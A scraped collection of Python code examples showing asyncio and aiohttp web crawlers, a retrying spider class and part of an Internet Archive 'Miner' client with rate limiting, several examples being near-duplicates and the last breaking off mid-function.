class WebCrawler(object):
    def __init__(self, url, max_requests, loop, max_coroutines=100):
        self.url = url
        self.max_requests = max_requests
        self.links_visited = set()
        self.max_coroutines = max_coroutines
        self.queue = Queue()
        self.loop = loop

    @asyncio.coroutine
    def work(self):
        while True:
            url = yield from self.queue.get()
            fetcher = Fetcher(url, self)
            yield from fetcher.connect()
            self.queue.task_done()

    @asyncio.coroutine
    def web_crawler(self):
        self.queue.put_nowait(self.url)
        self.session = aiohttp.ClientSession(loop=self.loop)
        workers = [
            asyncio.Task(self.work()) for _ in range(self.max_coroutines)
        ]
        yield from self.queue.join()
        for worker in workers:
            worker.cancel()
        yield from self.session.close()
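
# A minimal driver sketch (not part of the original snippet) for the WebCrawler
# above, assuming asyncio, aiohttp and an asyncio.Queue import plus the Fetcher
# helper class (not shown here); the entry URL and request limit are placeholders.
if __name__ == '__main__':
    loop = asyncio.get_event_loop()
    crawler = WebCrawler('http://example.com', max_requests=100, loop=loop)
    loop.run_until_complete(crawler.web_crawler())
    loop.close()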
Example #2
class Fetcher:
    def __init__(self, loop):
        self.num_worker = 10
        self.loop = loop
        self.q = Queue()
        self.seen_urls = set(['/'])

    @asyncio.coroutine
    def manager(self):
        workers = [
            self.loop.create_task(self.worker())
            for _ in range(self.num_worker)
        ]
        yield from self.q.put('/')
        # wait until q is empty
        yield from self.q.join()
        for w in workers:
            w.cancel()

    @asyncio.coroutine
    def worker(self):
        while True:
            url = yield from self.q.get()

            sock = socket.socket(socket.AF_INET)
            sock.setblocking(False)
            try:
                yield from self.loop.sock_connect(sock, ('dilbert.com', 80))
            except BlockingIOError:
                pass

            request = 'GET {} HTTP/1.1\r\nHost: dilbert.com\r\nConnection: close\r\n\r\n'.format(
                url)
            yield from self.loop.sock_sendall(sock, request.encode('ascii'))

            response = b''
            chunk = yield from self.loop.sock_recv(sock, 4096)
            while chunk:
                response += chunk
                chunk = yield from self.loop.sock_recv(sock, 4096)

            links = yield from self.parse_link(response)
            for link in links.difference(self.seen_urls):
                yield from self.q.put(link)

            self.seen_urls.update(links)
            self.q.task_done()
            sock.close()

    @asyncio.coroutine
    def parse_link(self, response):
        links = set([])
        d = pq(response)
        anchors = d("a")
        for anchor in anchors:
            href = anchor.get("href")
            if href and href[:5] == "http:" and href[7:14] == "dilbert":
                # Queue only the path portion so worker() can request it
                # from dilbert.com.
                links.add(href[len("http://dilbert.com"):])
        return links
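
# A minimal way to run the Fetcher above (a sketch, not part of the original
# snippet), assuming asyncio, socket, an asyncio.Queue import and pyquery's pq
# are available; manager() seeds the queue with '/' and joins it, so a single
# run_until_complete drives the whole crawl.
if __name__ == '__main__':
    loop = asyncio.get_event_loop()
    fetcher = Fetcher(loop)
    loop.run_until_complete(fetcher.manager())
    loop.close()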
Example #3
class Crawler:
    def __init__(self, root_url, max_redirect):
        self.max_tasks = 10
        self.max_redirect = max_redirect
        self.q = Queue()
        self.seen_urls = set()

        # aiohttp's ClientSession does connection pooling and
        # HTTP keep-alives for us.
        self.session = aiohttp.ClientSession(loop=loop)

        # Put (URL, max_redirect) in the queue.
        self.q.put_nowait((root_url, self.max_redirect))

    @asyncio.coroutine
    def crawl(self):
        """Run the crawler until all work is done."""
        workers = [asyncio.Task(self.work())
                   for _ in range(self.max_tasks)]

        # When all work is done, exit.
        yield from self.q.join()
        for w in workers:
            w.cancel()

    @asyncio.coroutine
    def work(self):
        while True:
            url, max_redirect = yield from self.q.get()

            # Download page and add new links to self.q.
            yield from self.fetch(url, max_redirect)
            self.q.task_done()


# Begin fetching http://xkcd.com/353/
# (Fetcher and Task below come from the original snippet's surrounding code
#  and are not the classes defined above.)
fetcher = Fetcher('/353/')
Task(fetcher.fetch())

loop = asyncio.get_event_loop()

crawler = Crawler('http://xkcd.com',
                  max_redirect=10)

loop.run_until_complete(crawler.crawl())
Example #4
File: test.py Project: romandev/bible
class Crawler:
    def __init__(self, root_url, max_redirect):
        self.max_tasks = 10
        self.max_redirect = max_redirect
        self.q = Queue()
        self.seen_urls = set()

        self.session = aiohttp.ClientSession(loop=loop)

        self.q.put_nowait((root_url, self.max_redirect))

    @asyncio.coroutine
    def crawl(self):
        workers = [asyncio.Task(self.work()) for _ in range(self.max_tasks)]
        yield from self.q.join()
        for w in workers:
            w.cancel()

    @asyncio.coroutine
    def work(self):
        while True:
            url, max_redirect = yield from self.q.get()
            yield from self.fetch(url, max_redirect)
            # On threads vs. this single-threaded coroutine model, see:
            # https://segmentfault.com/q/1010000009765115
            self.q.task_done()

    @asyncio.coroutine
    def fetch(self, url, max_redirect):
        response = yield from self.session.get(url, allow_redirects=False)

        try:
            if is_redirect(response):
                if max_redirect > 0:
                    next_url = response.headers['location']
                    if next_url in self.seen_urls:
                        return
                    self.seen_urls.add(next_url)
                    self.q.put_nowait((next_url, max_redirect - 1))
            else:
                links = yield from self.parse_links(response)
                for link in links.difference(self.seen_urls):
                    self.q.put_nowait((link, self.max_redirect))
                self.seen_urls.update(links)
        finally:
            yield from response.release()
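
# This example (and several of the ones below) calls an is_redirect() helper
# that the snippets do not include. A minimal sketch, assuming only the HTTP
# status code needs to be inspected:
def is_redirect(response):
    # 3xx responses whose Location header the crawler should follow.
    return response.status in (300, 301, 302, 303, 307)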
Example #5
# asyncio.JoinableQueue was merged into asyncio.Queue (Python 3.4.4+).
@asyncio.coroutine
def worker(get, queue: asyncio.Queue, output):
    while True:
        item = yield from queue.get()
        # This is horrible and I feel bad for writing it, believe me
        try:
            if item is None:
                return

            chunks, id = item

            for i in range(id, id + chunks):
                try:
                    data = yield from get("item/{}".format(i))
                    output(data)
                except Exception:
                    pass
        except Exception as e:
            pass
        finally:
            queue.task_done()
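
# A hedged sketch of wiring up the worker above: 'get' is assumed to be a
# coroutine taking a path and returning parsed data, 'output' any callable,
# and the (chunks, id) work items plus the None stop sentinel follow the
# usage implied by the function body.
import asyncio

@asyncio.coroutine
def fake_get(path):
    # Stand-in for the real 'get' coroutine.
    return {'path': path}

if __name__ == '__main__':
    loop = asyncio.get_event_loop()
    queue = asyncio.Queue()
    queue.put_nowait((3, 1))   # fetch item/1 .. item/3
    queue.put_nowait(None)     # sentinel: stop the worker
    loop.run_until_complete(worker(fake_get, queue, print))
    loop.close()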
Example #6
class Spider:
    def __init__(self, max_tries=30, max_tasks=10, timeout=5,
                 rootDir=os.getcwd()):
        self.max_tries = max_tries
        self.max_tasks = max_tasks
        self.loop = asyncio.get_event_loop()
        self.q = Queue(loop=self.loop)
        self.session = aiohttp.ClientSession(loop=self.loop)
        self.timeout = timeout
        self.rootDir = rootDir

    def close(self):
        self.session.close()


    def append_request(self, request):
        self.q.put_nowait(request)


    @asyncio.coroutine
    def _get_request(self):
        r = yield from self.q.get()
        return r

    @asyncio.coroutine
    def fetch(self, request_type, url, params, data):
        """Fetch one URL"""
        tries = 0
        exception = None
        content = None  # avoids a NameError below when the response is not 200
        while tries < self.max_tries:
            try:
                print("try %s---->%d times"%(url, tries))
                with aiohttp.Timeout(self.timeout):
                    response = yield from self.session.get(url, params=params)
                    if response.status == 200:
                        content_type = response.headers.get('content-type')
                        if content_type in CONTENT_TYPE_TEXT:
                            with aiohttp.Timeout(self.timeout):
                                content = yield from response.text(encoding='GBK')
                        else:
                            with aiohttp.Timeout(self.timeout):
                                content = yield from response.read()
                    break
            except asyncio.TimeoutError:
                print("timeout")
            except aiohttp.ClientError as client_error:
                print("client error")
            except Exception:
                print("unknown error")
            tries += 1
        else:
            print("try %s---->more than %d times, quit"%(url, tries))
            return None

        response.release()
        return content

    @asyncio.coroutine
    def _work(self):
        """Process queue items forever."""
        try:
            while True:
                r = yield from self._get_request()
                content = yield from self.fetch(r.request_type, r.url, r.params, r.data)
                if content:
                    r.handle_func(content)
                self.q.task_done()
        except asyncio.CancelledError:
            pass

    @asyncio.coroutine
    def work(self):
        yield from self._work()

    @asyncio.coroutine
    def spider(self):
        """run  the spider until all finished"""
        workers = [asyncio.Task(self.work(), loop=self.loop)
                   for _ in range(self.max_tasks)]
        yield from self.q.join()

        for w in workers:
            w.cancel()
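
# A hedged sketch of driving the Spider above. Request is a hypothetical
# stand-in for whatever object append_request() normally receives; it only
# needs the attributes _work() reads. CONTENT_TYPE_TEXT is assumed to be a
# collection of text-like content types defined elsewhere in the original
# module; the value below is only illustrative.
import collections

CONTENT_TYPE_TEXT = ('text/html', 'text/plain')  # assumed definition

Request = collections.namedtuple(
    'Request', ['request_type', 'url', 'params', 'data', 'handle_func'])

if __name__ == '__main__':
    spider = Spider(max_tasks=5)
    spider.append_request(
        Request('GET', 'http://example.com', params=None, data=None,
                handle_func=print))
    spider.loop.run_until_complete(spider.spider())
    spider.close()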
Example #7
class Crawler:
    def __init__(self, roots,
                 exclude=None, strict=True,  # What to crawl.
                 max_redirect=10, max_tries=4,  # Per-url limits.
                 max_tasks=10, *, loop=None):
        self.loop = loop or asyncio.get_event_loop()
        self.roots = roots
        self.exclude = exclude
        self.strict = strict
        self.max_redirect = max_redirect
        self.max_tries = max_tries
        self.max_tasks = max_tasks
        self.q = Queue(loop=self.loop)
        self.seen_urls = set()
        self.done = []
        self.session = aiohttp.ClientSession(loop=self.loop)
        self.root_domains = set()
        for root in roots:
            parts = urllib.parse.urlparse(root)
            host, port = urllib.parse.splitport(parts.netloc)
            if not host:
                continue
            if re.match(r'\A[\d\.]*\Z', host):
                self.root_domains.add(host)
            else:
                host = host.lower()
                if self.strict:
                    self.root_domains.add(host)
                else:
                    self.root_domains.add(lenient_host(host))
        for root in roots:
            self.add_url(root)
        self.t0 = time.time()
        self.t1 = None

    def close(self):
        self.session.close()

    def host_okay(self, host):
        host = host.lower()
        if host in self.root_domains:
            return True
        if re.match(r'\A[\d\.]*\Z', host):
            return False
        if self.strict:
            return self._host_okay_strictish(host)
        else:
            return self._host_okay_lenient(host)

    def _host_okay_strictish(self, host):
        host = host[4:] if host.startswith('www.') else 'www.' + host
        return host in self.root_domains

    def _host_okay_lenient(self, host):
        return lenient_host(host) in self.root_domains

    def record_statistic(self, fetch_statistic):
        self.done.append(fetch_statistic)

    @asyncio.coroutine
    def parse_links(self, response):
        links = set()
        content_type = None
        encoding = None
        body = yield from response.read()

        if response.status == 200:
            content_type = response.headers.get('content-type')
            pdict = {}

            if content_type:
                content_type, pdict = cgi.parse_header(content_type)

            encoding = pdict.get('charset', 'utf-8')
            if content_type in ('text/html', 'application/xml'):
                text = yield from response.text()

                # Replace href with (?:href|src) to follow image links.
                urls = set(re.findall(r'''(?i)href=["']([^\s"'<>]+)''',
                                      text))
                if urls:
                    LOGGER.info('got %r distinct urls from %r',
                                len(urls), response.url)
                for url in urls:
                    normalized = urllib.parse.urljoin(response.url, url)
                    defragmented, frag = urllib.parse.urldefrag(normalized)
                    if self.url_allowed(defragmented):
                        links.add(defragmented)

        stat = FetchStatistic(
            url=response.url,
            next_url=None,
            status=response.status,
            exception=None,
            size=len(body),
            content_type=content_type,
            encoding=encoding,
            num_urls=len(links),
            num_new_urls=len(links - self.seen_urls))

        return stat, links

    @asyncio.coroutine
    def fetch(self, url, max_redirect):
        tries = 0
        exception = None
        while tries < self.max_tries:
            try:
                response = yield from self.session.get(
                    url, allow_redirects=False)

                if tries > 1:
                    LOGGER.info('try %r for %r success', tries, url)

                break
            except aiohttp.ClientError as client_error:
                LOGGER.info('try %r for %r raised %r', tries, url,
                            client_error)
                exception = client_error

            tries += 1
        else:
            # We never broke out of the loop: all tries failed.
            LOGGER.error('%r failed after %r tries',
                         url, self.max_tries)
            self.record_statistic(FetchStatistic(url=url,
                                                 next_url=None,
                                                 status=None,
                                                 exception=exception,
                                                 size=0,
                                                 content_type=None,
                                                 encoding=None,
                                                 num_urls=0,
                                                 num_new_urls=0))
            return

        try:
            if is_redirect(response):
                location = response.headers['location']
                next_url = urllib.parse.urljoin(url, location)
                self.record_statistic(FetchStatistic(url=url,
                                                     next_url=next_url,
                                                     status=response.status,
                                                     exception=None,
                                                     size=0,
                                                     content_type=None,
                                                     encoding=None,
                                                     num_urls=0,
                                                     num_new_urls=0))

                if next_url in self.seen_urls:
                    return
                if max_redirect > 0:
                    LOGGER.info('redirect to %r from %r', next_url, url)
                    self.add_url(next_url, max_redirect - 1)
                else:
                    LOGGER.error('redirect limit reached for %r from %r',
                                 next_url, url)
            else:
                stat, links = yield from self.parse_links(response)
                self.record_statistic(stat)
                for link in links.difference(self.seen_urls):
                    self.q.put_nowait((link, self.max_redirect))
                self.seen_urls.update(links)
        finally:
            yield from response.release()

    @asyncio.coroutine
    def work(self):
        # Process queue items forever.
        try:
            while True:
                url, max_redirect = yield from self.q.get()
                assert url in self.seen_urls
                yield from self.fetch(url, max_redirect)
                self.q.task_done()
        except asyncio.CancelledError:
            pass

    def url_allowed(self, url):
        if self.exclude and re.search(self.exclude, url):
            return False
        parts = urllib.parse.urlparse(url)
        if parts.scheme not in ('http', 'https'):
            LOGGER.debug('skipping non-http scheme in %r', url)
            return False
        host, port = urllib.parse.splitport(parts.netloc)
        if not self.host_okay(host):
            LOGGER.debug('skipping non-root host in %r', url)
            return False
        return True

    def add_url(self, url, max_redirect=None):
        # Add a URL to the queue if not seen before.
        if max_redirect is None:
            max_redirect = self.max_redirect
        LOGGER.debug('adding %r %r', url, max_redirect)
        self.seen_urls.add(url)
        self.q.put_nowait((url, max_redirect))

    @asyncio.coroutine
    def crawl(self):
        # Run the crawler until all finished.
        workers = [asyncio.Task(self.work(), loop=self.loop)
                   for _ in range(self.max_tasks)]
        self.t0 = time.time()
        yield from self.q.join()
        self.t1 = time.time()
        for w in workers:
            w.cancel()
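
# The Crawler above (and the near-identical copies below) relies on a
# FetchStatistic record and a lenient_host() helper that the snippets do not
# include. A sketch of plausible definitions, inferred from how the fields
# and the host comparison are used:
from collections import namedtuple

FetchStatistic = namedtuple('FetchStatistic',
                            ['url', 'next_url', 'status', 'exception', 'size',
                             'content_type', 'encoding', 'num_urls',
                             'num_new_urls'])

def lenient_host(host):
    # Compare only the last two components of the host name,
    # e.g. 'news.example.com' -> 'examplecom'.
    parts = host.split('.')[-2:]
    return ''.join(parts)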
Example #8
class Crawler:
    def __init__(self, roots, exclude=None, strict=True, max_redirect=10, max_tries=4, max_tasks=10, *, loop=None):
        self.loop = loop or asyncio.get_event_loop()
        self.roots = roots
        self.exclude = exclude
        self.strict = strict
        self.max_redirect = max_redirect
        self.max_tries = max_tries
        self.max_tasks = max_tasks
        self.q = Queue(loop=self.loop)
        self.seen_urls = set()
        self.done = []
        self.session = aiohttp.ClientSession(loop=self.loop)
        self.root_domains = set()
        for root in roots:
            parts = urllib.parse.urlparse(root)
            host, port = urllib.parse.splitport(parts.netloc)
            if not host:
                continue
            if re.match(r'\A[\d\.]*\Z', host):
                self.root_domains.add(host)
            else:
                host = host.lower()
                if self.strict:
                    self.root_domains.add(host)
                else:
                    self.root_domains.add(lenient_host(host))
        for root in roots:
            self.add_url(root)
        self.t0 = time.time()
        self.t1 = None

    def close(self):
        self.session.close()

    def host_okay(self, host):
        host = host.lower()
        if host in self.root_domains:
            return True
        if re.match(r'\A[\d\.]*\Z', host):
            return False
        if self.strict:
            return self._host_okay_strictish(host)
        else:
            return self._host_okay_lenient(host)

    def _host_okay_strictish(self, host):
        host = host[4:] if host.startswith('www.') else 'www.' + host
        return host in self.root_domains

    def _host_okay_lenient(self, host):
        return lenient_host(host) in self.root_domains

    def record_statistic(self, fetch_statistic):
        self.done.append(fetch_statistic)

    @asyncio.coroutine
    def parse_links(self, response):
        links = set()
        content_type = None
        encoding = None
        body = yield from response.read()

        if response.status == 200:
            content_type = response.headers.get('content-type')
            pdict = {}

            if content_type:
                content_type, pdict = cgi.parse_header(content_type)

            encoding = pdict.get('charset', 'utf-8')
            if content_type in ('text/html', 'application/xml'):
                text = yield from response.text()

                urls = set(re.findall(r"""(?i)href=["']?([^\s"'<>]+)""", text))
                if urls:
                    logger.info('got %r distinct urls from %r', len(urls), response.url)
                for url in urls:
                    normalized = urllib.parse.urljoin(response.url, url)
                    defragmented, frag = urllib.parse.urldefrag(normalized)
                    if self.url_allowed(defragmented):
                        links.add(defragmented)

        stats = FetchStatistic(url=response.url, next_url=None, status=response.status, exception=None, size=len(body),
                               content_type=content_type, encoding=encoding, num_urls=len(links),
                               num_new_urls=len(links - self.seen_urls))
        return stats, links

    @asyncio.coroutine
    def fetch(self, url, max_redirect):
        tries = 0
        exception = None
        while tries < self.max_tries:
            try:
                response = yield from self.session.get(url, allow_redirects=False)
                if tries > 1:
                    logger.info('try %r for %r success', tries, url)
                break
            except aiohttp.ClientError as client_error:
                logger.info('try %r for %r raised %r', tries, url, client_error)
                exception = client_error

            tries += 1

        else:
            logger.error('%r failed after %r tries', url, self.max_tries)

            self.record_statistic(FetchStatistic(url=url, next_url=None, status=None, exception=exception, size=0,
                                                 content_type=None, encoding=None, num_urls=0, num_new_urls=0))
            return

        try:
            if is_redirect(response):
                location = response.headers['location']
                next_url = urllib.parse.urljoin(url, location)
                self.record_statistic(
                    FetchStatistic(url=url, next_url=next_url, status=response.status, exception=None, size=0,
                                   content_type=None, encoding=None, num_urls=0, num_new_urls=0))
                if next_url in self.seen_urls:
                    return
                if max_redirect > 0:
                    logger.info('redirect to %r from %r', next_url, url)
                    self.add_url(next_url, max_redirect - 1)
                else:
                    logger.error('redirect limit reached for %r from %r', next_url, url)
            else:
                stat, links = yield from self.parse_links(response)
                self.record_statistic(stat)
                for link in links.difference(self.seen_urls):
                    self.q.put_nowait((link, self.max_redirect))
                self.seen_urls.update(links)
        finally:
            # Return the connection to the pool.
            yield from response.release()

    @asyncio.coroutine
    def work(self):
        try:
            while True:
                url, max_redirect = yield from self.q.get()
                assert url in self.seen_urls
                yield from self.fetch(url, max_redirect)
                self.q.task_done()
        except asyncio.CancelledError:
            pass

    def url_allowed(self, url):
        if self.exclude and re.search(self.exclude, url):
            return False
        parts = urllib.parse.urlparse(url)
        if parts.scheme not in ('http', 'https'):
            logger.debug('skipping non-http scheme in %r', url)
            return False
        host, port = urllib.parse.splitport(parts.netloc)
        if not self.host_okay(host):
            logger.debug('skipping non-root host in %r', url)
            return False
        return True

    def add_url(self, url, max_redirect=None):
        if max_redirect is None:
            max_redirect = self.max_redirect
        logger.debug('adding %r %r', url, max_redirect)
        self.seen_urls.add(url)
        self.q.put_nowait((url, max_redirect))

    @asyncio.coroutine
    def crawl(self):
        workers = [asyncio.Task(self.work(), loop=self.loop) for _ in range(self.max_tasks)]
        self.t0 = time.time()
        yield from self.q.join()
        self.t1 = time.time()
        for w in workers:
            w.cancel()
Example #9
File: __init__.py Project: MVilstrup/swarm
class Fetcher(object):
    """Async page fetcher."""

    def __init__(self, max_tasks=20, max_redirect=10):
        self.max_tasks = max_tasks
        self.max_redirect = max_redirect
        self.q = Queue()

        # aiohttp's ClientSession does connection pooling and
        # HTTP keep-alives for us.
        loop = asyncio.get_event_loop()
        # Create the session before fetch() starts the workers that use it.
        self.session = aiohttp.ClientSession(loop=loop)
        loop.run_until_complete(self.fetch())


    @asyncio.coroutine
    def fetch(self):
        """
        Run the fetcher until all work is done.
        """
        # Create workers that fetch pages
        workers = [asyncio.Task(self.work())
                   for _ in range(self.max_tasks // 2)]

        # Create seeders that take URLs from Redis and add them to the local queue
        seeders = [asyncio.Task(self.get_seeds())
                   for _ in range(self.max_tasks // 2)]

        # When all work is done, exit.
        yield from self.q.join()
        for s in seeders:
            s.cancel()
        for w in workers:
            w.cancel()

    @asyncio.coroutine
    def work(self):
        while True:
            # Get URLs from own queue
            url = yield from self.q.get()

            # Download page
            yield from self.fetch_url(url)
            self.q.task_done()

    @asyncio.coroutine
    def fetch_url(self, url):
        # Handle redirects ourselves.
        response = yield from self.session.get(
            url, allow_redirects=True)

        try:
            # Handle the response
            pass
        finally:
            # Return connection to pool.
            yield from response.release()


    @asyncio.coroutine
    def get_seeds(self):
        while True:
            pass
Example #10
File: crawling.py Project: wmz0001/crawler
class Crawler:
    """Crawl a set of URLs.

    This manages two sets of URLs: 'urls' and 'done'.  'urls' is a set of
    URLs seen, and 'done' is a list of FetchStatistics.
    """
    def __init__(self, roots,
                 exclude=None, strict=True,  # What to crawl.
                 max_redirect=10, max_tries=4,  # Per-url limits.
                 max_tasks=10, *, loop=None):   # The lone * indicates that all following arguments are keyword-only arguments
        self.loop = loop or asyncio.get_event_loop()
        self.roots = roots
        self.exclude = exclude
        self.strict = strict
        self.max_redirect = max_redirect
        self.max_tries = max_tries
        self.max_tasks = max_tasks
        self.q = Queue(loop=self.loop)
        self.seen_urls = set()
        self.done = []
        self.session = aiohttp.ClientSession(loop=self.loop)
        self.root_domains = set()
        for root in roots:
            parts = urllib.parse.urlparse(root)
            host, port = urllib.parse.splitport(parts.netloc)
            if not host:
                continue
            if re.match(r'\A[\d\.]*\Z', host):  # \A and \Z are similar to ^ and $, \d represents the digital.(0.0.0.0)
                self.root_domains.add(host)
            else:
                host = host.lower()
                if self.strict:
                    self.root_domains.add(host)
                else:
                    self.root_domains.add(lenient_host(host))
        for root in roots:
            self.add_url(root)
        self.t0 = time.time()
        self.t1 = None

    def close(self):
        """Close resources."""
        self.session.close()

    def host_okay(self, host):
        """Check if a host should be crawled.

        A literal match (after lowercasing) is always good.  For hosts
        that don't look like IP addresses, some approximate matches
        are okay depending on the strict flag.
        """
        host = host.lower()
        if host in self.root_domains:
            return True
        if re.match(r'\A[\d\.]*\Z', host):
            return False
        if self.strict:
            return self._host_okay_strictish(host)
        else:
            return self._host_okay_lenient(host)

    def _host_okay_strictish(self, host):
        """Check if a host should be crawled, strict-ish version.

        This checks for equality modulo an initial 'www.' component.
        """
        host = host[4:] if host.startswith('www.') else 'www.' + host
        return host in self.root_domains

    def _host_okay_lenient(self, host):
        """Check if a host should be crawled, lenient version.

        This compares the last two components of the host.
        """
        return lenient_host(host) in self.root_domains

    def record_statistic(self, fetch_statistic):
        """Record the FetchStatistic for completed / failed URL."""
        self.done.append(fetch_statistic)

    @asyncio.coroutine
    def parse_links(self, response):
        """Return a FetchStatistic and list of links."""
        links = set()
        content_type = None
        encoding = None
        body = yield from response.read()

        if response.status == 200:
            content_type = response.headers.get('content-type')
            pdict = {}

            if content_type:
                content_type, pdict = cgi.parse_header(content_type)

            encoding = pdict.get('charset', 'utf-8')
            if content_type in ('text/html', 'application/xml'):
                text = yield from response.text()

                urls = set(re.findall(r'''(?i)href=["']([^\s"'<>]+)''',
                                      text))
                if urls:
                    LOGGER.info('got %r distinct urls from %r',
                                len(urls), response.url)
                for url in urls:
                    normalized = urllib.parse.urljoin(response.url, url)
                    defragmented, frag = urllib.parse.urldefrag(normalized)
                    if self.url_allowed(defragmented):
                        links.add(defragmented)

        stat = FetchStatistic(
            url=response.url,
            next_url=None,
            status=response.status,
            exception=None,
            size=len(body),
            content_type=content_type,
            encoding=encoding,
            num_urls=len(links),
            num_new_urls=len(links - self.seen_urls))

        return stat, links

    @asyncio.coroutine
    def fetch(self, url, max_redirect):
        """Fetch one URL."""
        tries = 0
        exception = None
        while tries < self.max_tries:
            try:
                response = yield from self.session.get(
                    url, allow_redirects=False)

                if tries > 1:
                    LOGGER.info('try %r for %r success', tries, url)

                break
            except aiohttp.ClientError as client_error:
                LOGGER.info('try %r for %r raised %r', tries, url, client_error)
                exception = client_error

            tries += 1
        else:
            # We never broke out of the loop: all tries failed.
            LOGGER.error('%r failed after %r tries',
                         url, self.max_tries)
            self.record_statistic(FetchStatistic(url=url,
                                                 next_url=None,
                                                 status=None,
                                                 exception=exception,
                                                 size=0,
                                                 content_type=None,
                                                 encoding=None,
                                                 num_urls=0,
                                                 num_new_urls=0))
            return

        try:
            if is_redirect(response):
                location = response.headers['location']
                next_url = urllib.parse.urljoin(url, location)
                self.record_statistic(FetchStatistic(url=url,
                                                     next_url=next_url,
                                                     status=response.status,
                                                     exception=None,
                                                     size=0,
                                                     content_type=None,
                                                     encoding=None,
                                                     num_urls=0,
                                                     num_new_urls=0))

                if next_url in self.seen_urls:
                    return
                if max_redirect > 0:
                    LOGGER.info('redirect to %r from %r', next_url, url)
                    self.add_url(next_url, max_redirect - 1)
                else:
                    LOGGER.error('redirect limit reached for %r from %r',
                                 next_url, url)
            else:
                stat, links = yield from self.parse_links(response)
                self.record_statistic(stat)
                for link in links.difference(self.seen_urls):
                    self.q.put_nowait((link, self.max_redirect))
                self.seen_urls.update(links)
        finally:
            yield from response.release()

    @asyncio.coroutine
    def work(self):
        """Process queue items forever."""
        try:
            while True:
                url, max_redirect = yield from self.q.get()
                assert url in self.seen_urls
                yield from self.fetch(url, max_redirect)
                self.q.task_done()
        except asyncio.CancelledError:
            pass

    def url_allowed(self, url):
        if self.exclude and re.search(self.exclude, url):
            return False
        parts = urllib.parse.urlparse(url)
        if parts.scheme not in ('http', 'https'):
            LOGGER.debug('skipping non-http scheme in %r', url)
            return False
        host, port = urllib.parse.splitport(parts.netloc)
        if not self.host_okay(host):
            LOGGER.debug('skipping non-root host in %r', url)
            return False
        return True

    def add_url(self, url, max_redirect=None):
        """Add a URL to the queue if not seen before."""
        if max_redirect is None:
            max_redirect = self.max_redirect
        LOGGER.debug('adding %r %r', url, max_redirect)
        self.seen_urls.add(url)
        self.q.put_nowait((url, max_redirect))

    @asyncio.coroutine
    def crawl(self):
        """Run the crawler until all finished."""
        workers = [asyncio.Task(self.work(), loop=self.loop)
                   for _ in range(self.max_tasks)]
        self.t0 = time.time()
        yield from self.q.join()
        self.t1 = time.time()
        for w in workers:
            w.cancel()
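
# A minimal driver sketch for this Crawler (not part of the original snippet),
# assuming the module-level imports (asyncio, aiohttp, cgi, re, time, urllib,
# the LOGGER object) and the helpers sketched earlier are in place; the root
# URL is only a placeholder.
if __name__ == '__main__':
    loop = asyncio.get_event_loop()
    crawler = Crawler(['http://example.com'], max_tasks=5)
    try:
        loop.run_until_complete(crawler.crawl())
    finally:
        crawler.close()
        loop.close()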
Example #11
File: core.py Project: pl77/iamine
class Miner(object):

    def __init__(self,
                 loop=None,
                 max_tasks=None,
                 retries=None,
                 secure=None,
                 hosts=None,
                 params=None,
                 config=None,
                 config_file=None,
                 access=None,
                 secret=None,
                 debug=None):

        # Set default values for kwargs.
        loop = asyncio.get_event_loop() if not loop else loop
        max_tasks = 100 if not max_tasks else max_tasks
        max_retries = 10 if not retries else retries
        protocol = 'http://' if not secure else 'https://'
        config = get_config(config, config_file)
        access = config.get('s3', {}).get('access', access)
        secret = config.get('s3', {}).get('secret', secret)
        debug = True if debug else False

        self.max_tasks = max_tasks
        self.max_retries = max_retries
        self.protocol = protocol
        self.hosts = hosts
        self.config = config
        self.access = access
        self.debug = debug
        self.cookies = config.get('cookies', {})

        # Asyncio/Aiohttp settings.
        self.connector = aiohttp.TCPConnector(share_cookies=True, loop=loop)
        self.connector.update_cookies(self.cookies)
        self.loop = loop
        self.q = Queue(loop=self.loop)

        # Require valid access key!
        self.assert_s3_keys_valid(access, secret)

        # Rate limiting.
        self._max_per_second = self.get_global_rate_limit()
        self._min_interval = 1.0 / float(self._max_per_second)
        self._last_time_called = 0.0

    def close(self):
        self.connector.close()
        self.loop.stop()
        self.loop.close()

    def assert_s3_keys_valid(self, access, secret):
        url = '{}s3.us.archive.org?check_auth=1'.format(self.protocol)
        r = urllib.request.Request(url)
        r.add_header('Authorization', 'LOW {0}:{1}'.format(access, secret))
        f = urllib.request.urlopen(r)
        j = json.loads(f.read().decode('utf-8'))
        if j.get('authorized') is not True:
            raise AuthenticationError(j.get('error'))

    def get_global_rate_limit(self):
        """Get the global rate limit per client.

        :rtype: int
        :returns: The global rate limit for each client.
        """
        r = urllib.request.urlopen('https://archive.org/metadata/iamine-rate-limiter')
        j = json.loads(r.read().decode('utf-8'))
        return int(j.get('metadata', {}).get('rate_per_second', 300))

    def _rate_limited():
        """A rate limit decorator for limiting the number of times the
        decorated :class:`Miner` method can be called. Limits are set in
        :attr:`Miner._max_per_second`.
        """
        def decorate(func):
            def rate_limited_func(self, *args, **kwargs):
                elapsed = time.monotonic() - self._last_time_called
                self.left_to_wait = self._min_interval - elapsed
                if self.left_to_wait > 0:
                    # time.sleep() blocks the event loop; kept to mirror the
                    # original throttling approach.
                    time.sleep(self.left_to_wait)
                self._last_time_called = time.monotonic()
                yield from func(self, *args, **kwargs)
            return rate_limited_func
        return decorate

    @_rate_limited()
    def make_rate_limited_request(self, request):
        yield from request.make_request()

    @asyncio.coroutine
    def work(self):
        while True:
            request = yield from self.q.get()
            yield from self.make_rate_limited_request(request)
            self.q.task_done()

    @asyncio.coroutine
    def q_requests(self, requests):
        for req in requests:
            self.q.put_nowait(req)

    @asyncio.coroutine
    def mine(self, requests):
        workers = [asyncio.Task(self.work(), loop=self.loop)
                   for _ in range(self.max_tasks)]
        yield from self.q_requests(requests)

        yield from self.q.join()
        yield from asyncio.sleep(1)
        while not self.q.empty():
            yield from asyncio.sleep(1)

        for w in workers:
            w.cancel()
        yield from asyncio.sleep(.5)
Example #12
File: core.py Project: pl77/iamine
class SearchMiner(ItemMiner):

    def __init__(self, **kwargs):
        super(SearchMiner, self).__init__(**kwargs)
        # Item mining queue.
        self.iq = Queue(1000, loop=self.loop)

    def get_search_params(self, query, params):
        default_rows = 500
        search_params = {
            'q': 'all:1',
            'page': 1,
            'output': 'json',
        }
        if params:
            search_params.update({k: v for k, v in params.items() if v})
        if query:
            search_params['q'] = query
        if 'rows' not in search_params:
            search_params['rows'] = default_rows
        return search_params

    def get_search_info(self, params):
        url = make_url('/advancedsearch.php?', self.protocol, self.hosts)
        p = deepcopy(params)
        p['rows'] = 0

        params = urllib.parse.urlencode(p)
        url += params
        f = urllib.request.urlopen(url)
        return json.loads(f.read().decode('utf-8'))

    @asyncio.coroutine
    def _handle_search_results(self, resp, params=None, callback=None):
        j = yield from resp.json(encoding='utf-8')
        resp.close()
        identifiers = []
